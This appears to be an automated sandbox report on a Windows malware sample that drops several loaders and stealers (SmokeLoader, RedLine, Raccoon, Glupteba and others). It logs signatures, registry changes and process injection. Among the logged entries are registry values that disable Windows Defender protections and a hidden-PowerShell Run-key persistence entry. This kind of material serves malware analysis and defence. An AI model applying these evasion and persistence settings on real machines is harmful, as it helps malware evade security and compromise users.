Malware Analysis Report

2025-08-10 21:53

Sample ID 231025-fgq49sec22
Target 3kC15xy.exe
SHA256 623e3a1ec75a44ccc652e1ba8dabb1253a8be20d3b53102d2f8dcc9fe43fcba3
Tags
smokeloader amadey dcrat glupteba raccoon redline zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor google dropper evasion infostealer loader persistence phishing rat stealer trojan upx discovery rootkit spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

623e3a1ec75a44ccc652e1ba8dabb1253a8be20d3b53102d2f8dcc9fe43fcba3

Threat Level: Known bad

The file 3kC15xy.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader amadey dcrat glupteba raccoon redline zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor google dropper evasion infostealer loader persistence phishing rat stealer trojan upx discovery rootkit spyware

Smokeloader family

RedLine payload

Windows security bypass

DcRat

Modifies Windows Defender Real-time Protection settings

SmokeLoader

ZGRat

Glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess

Detected google phishing page

Raccoon Stealer payload

Raccoon

Glupteba payload

Detect ZGRat V1

RedLine

Amadey

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Drops file in Drivers directory

Modifies Windows Firewall

Stops running service(s)

Possible attempt to disable PatchGuard

Blocklisted process makes network request

Checks computer location settings

Reads user/profile data of web browsers

Unexpected DNS network traffic destination

Executes dropped EXE

Deletes itself

Loads dropped DLL

Checks BIOS information in registry

Windows security modification

UPX packed file

Accesses cryptocurrency files/wallets, possible credential harvesting

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Modifies registry class

Suspicious use of FindShellTrayWindow

Runs net.exe

Modifies Internet Explorer settings

Checks SCSI registry key(s)

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-25 04:50

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-25 04:50

Reported

2023-10-25 04:57

Platform

win7-20231023-en

Max time kernel

68s

Max time network

304s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\DDD1.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\8FB9.exe'\"" C:\Users\Admin\AppData\Local\Temp\8FB9.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 792 set thread context of 1900 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{48900C21-72F2-11EE-99C1-FA0DBFC6BDAF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000099b8a3c6ff97044781f9dc0475faca41000000000200000000001066000000010000200000009c4eaee1602e7c1b3ccac78bab6074415aeef75492a68f4e7c22d7ea4916b4bb000000000e8000000002000020000000557a82d2eb5e05d4d5bdf1c40dc1a98dc1b768193c925939196f5cd228ff89f5200000006e9ca9ccc5988207a98a4c0f3192eb91e5869ecc47a2090966b5426a3cde57cb4000000080a7741512853c8e4fbed92cb3f32269422c975075069d4c1674fb4757eaef297d621dbb4e8fa88cf7b2ee7b187301deda175e4cbafa2fc2dcc08c5253136a9e C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{485BADE1-72F2-11EE-99C1-FA0DBFC6BDAF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30cbde20ff06da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000099b8a3c6ff97044781f9dc0475faca4100000000020000000000106600000001000020000000ef355a8488b5f6fa298b258647158c48db018690a69ee0b0cb201a0f0a3e693a000000000e800000000200002000000026c8e26e3daa61de72b99af16bef3b0bfaeb356e3c3e6ecb7be018b26f6d7ed090000000a0cf75df8f3b5059c551e91d71c04a91d50461330383fab52849a7f5a40ca201613884c03f64837c021d3a3b58d5dabe9c4dcf1c0fa3e9183f15fc518b8e6bf7e7132d4ae663fa474ae8af2370061b6a47a4b97b6b947cc1f2ae610ca61b9ff8152d7c6f19d08eafbc18905c30af8962e80db44870476cba6c26cd22e0cc2b372c5483e9a36b8a0259cc29a15f2bc22e40000000b7209e545afaeaf43f0b3cd99ea7ba18878a57d2f169f134420fd301944375b7aa3128156639b5b01bb4e35a28d147491c4f1e7f10774b830641814a2852db60 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E45A.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1380 wrote to memory of 3024 N/A N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe
PID 1380 wrote to memory of 3024 N/A N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe
PID 1380 wrote to memory of 3024 N/A N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe
PID 1380 wrote to memory of 3024 N/A N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe
PID 1380 wrote to memory of 3024 N/A N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe
PID 1380 wrote to memory of 3024 N/A N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe
PID 1380 wrote to memory of 3024 N/A N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe
PID 1380 wrote to memory of 2576 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEFB.exe
PID 1380 wrote to memory of 2576 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEFB.exe
PID 1380 wrote to memory of 2576 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEFB.exe
PID 1380 wrote to memory of 2576 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEFB.exe
PID 1380 wrote to memory of 2808 N/A N/A C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 2808 N/A N/A C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 2808 N/A N/A C:\Windows\system32\cmd.exe
PID 3024 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3024 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3024 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3024 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3024 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3024 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3024 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\DDD1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 1380 wrote to memory of 2420 N/A N/A C:\Users\Admin\AppData\Local\Temp\E0A2.exe
PID 1380 wrote to memory of 2420 N/A N/A C:\Users\Admin\AppData\Local\Temp\E0A2.exe
PID 1380 wrote to memory of 2420 N/A N/A C:\Users\Admin\AppData\Local\Temp\E0A2.exe
PID 1380 wrote to memory of 2420 N/A N/A C:\Users\Admin\AppData\Local\Temp\E0A2.exe
PID 2784 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2784 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2784 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2784 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
